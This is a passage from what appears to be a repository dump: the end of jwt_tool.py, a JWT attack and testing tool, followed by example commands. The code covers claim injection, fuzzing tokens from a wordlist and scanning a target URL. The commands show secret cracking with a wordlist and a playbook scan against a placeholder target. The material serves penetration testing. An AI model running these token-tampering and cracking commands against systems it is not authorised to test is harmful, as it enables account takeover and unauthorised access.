2028 | rejigToken(headDict, paylDict, sig) 2029 | if args.sign: 2030 | signingToken(headDict, paylDict) 2031 | if args.injectclaims: 2032 | injectionfile = "" 2033 | newheadDict = headDict 2034 | newpaylDict = paylDict 2035 | if args.headerclaim: 2036 | if not args.headervalue: 2037 | cprintc("Must specify header values to match header claims to inject.", "red") 2038 | exit(1) 2039 | if len(args.headerclaim) != len(args.headervalue): 2040 | cprintc("Amount of header values must match header claims to inject.", "red") 2041 | exit(1) 2042 | if args.payloadclaim: 2043 | if not args.payloadvalue: 2044 | cprintc("Must specify payload values to match payload claims to inject.", "red") 2045 | exit(1) 2046 | if len(args.payloadclaim) != len(args.payloadvalue): 2047 | cprintc("Amount of payload values must match payload claims to inject.", "red") 2048 | exit(1) 2049 | if args.payloadclaim: 2050 | for payloadclaim, payloadvalue in zip(args.payloadclaim, args.payloadvalue): 2051 | if os.path.isfile(payloadvalue): 2052 | injectionfile = ["payload", payloadclaim, payloadvalue] 2053 | else: 2054 | newpaylDict, newPaylB64 = injectpayloadclaim(payloadclaim, payloadvalue) 2055 | paylB64 = newPaylB64 2056 | newContents = genContents(headDict, newpaylDict) 2057 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2058 | if args.headerclaim: 2059 | for headerclaim, headervalue in zip(args.headerclaim, args.headervalue): 2060 | if os.path.isfile(headervalue): 2061 | injectionfile = ["header", headerclaim, headervalue] 2062 | else: 2063 | newheadDict, newHeadB64 = injectheaderclaim(headerclaim, headervalue) 2064 | newContents = genContents(newheadDict, paylDict) 2065 | headDict, paylDict, sig, contents = 
validateToken(newContents+"."+sig) 2066 | if injectionfile: 2067 | if args.mode: 2068 | cprintc("Fuzzing cannot be used alongside scanning modes", "red") 2069 | exit(1) 2070 | cprintc("Fuzzing file loaded: "+injectionfile[2], "cyan") 2071 | with open(injectionfile[2], "r", encoding='utf-8', errors='ignore') as valLst: 2072 | nextVal = valLst.readline() 2073 | cprintc("Generating tokens from injection file...", "cyan") 2074 | utf8errors = 0 2075 | wordcount = 0 2076 | while nextVal: 2077 | if injectionfile[0] == "payload": 2078 | newpaylDict, newPaylB64 = injectpayloadclaim(injectionfile[1], nextVal.rstrip()) 2079 | newContents = genContents(headDict, newpaylDict) 2080 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2081 | paylB64 = newPaylB64 2082 | elif injectionfile[0] == "header": 2083 | newheadDict, newHeadB64 = injectheaderclaim(injectionfile[1], nextVal.rstrip()) 2084 | newContents = genContents(newheadDict, paylDict) 2085 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2086 | injectOut(newheadDict, newpaylDict) 2087 | nextVal = valLst.readline() 2088 | exit(1) 2089 | else: 2090 | if not args.mode: 2091 | injectOut(newheadDict, newpaylDict) 2092 | exit(1) 2093 | if args.mode: 2094 | if not config['argvals']['targeturl'] and not args.bare: 2095 | cprintc("No target specified (-t), cannot scan offline.", "red") 2096 | exit(1) 2097 | runScanning() 2098 | runActions() 2099 | exit(1) 2100 | --------------------------------------------------------------------------------
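A quick usage note on the bundled tools/jwt_tool.py above: the invocations below are a sketch based only on the flags defined in its argument parser (a bare token to decode, -C/-d for dictionary cracking, -t/-rh/-M for scanning a live target). The sample token is the one from the script's own epilog; the target URL, header value, and wordlist path are illustrative placeholders, not values taken from this repo.
```
# decode/inspect the sample token from the script's epilog (no key required)
python3 tools/jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po

# crack an HMAC-SHA secret with a dictionary (-C enables cracking, -d points at a wordlist; path is illustrative)
python3 tools/jwt_tool.py <JWT> -C -d /path/to/wordlist.txt

# playbook scan mode (-M pb) against a target URL (-t), sending the token in a request header (-rh)
python3 tools/jwt_tool.py -t https://target.example/api -rh "Authorization: Bearer <JWT>" -M pb
```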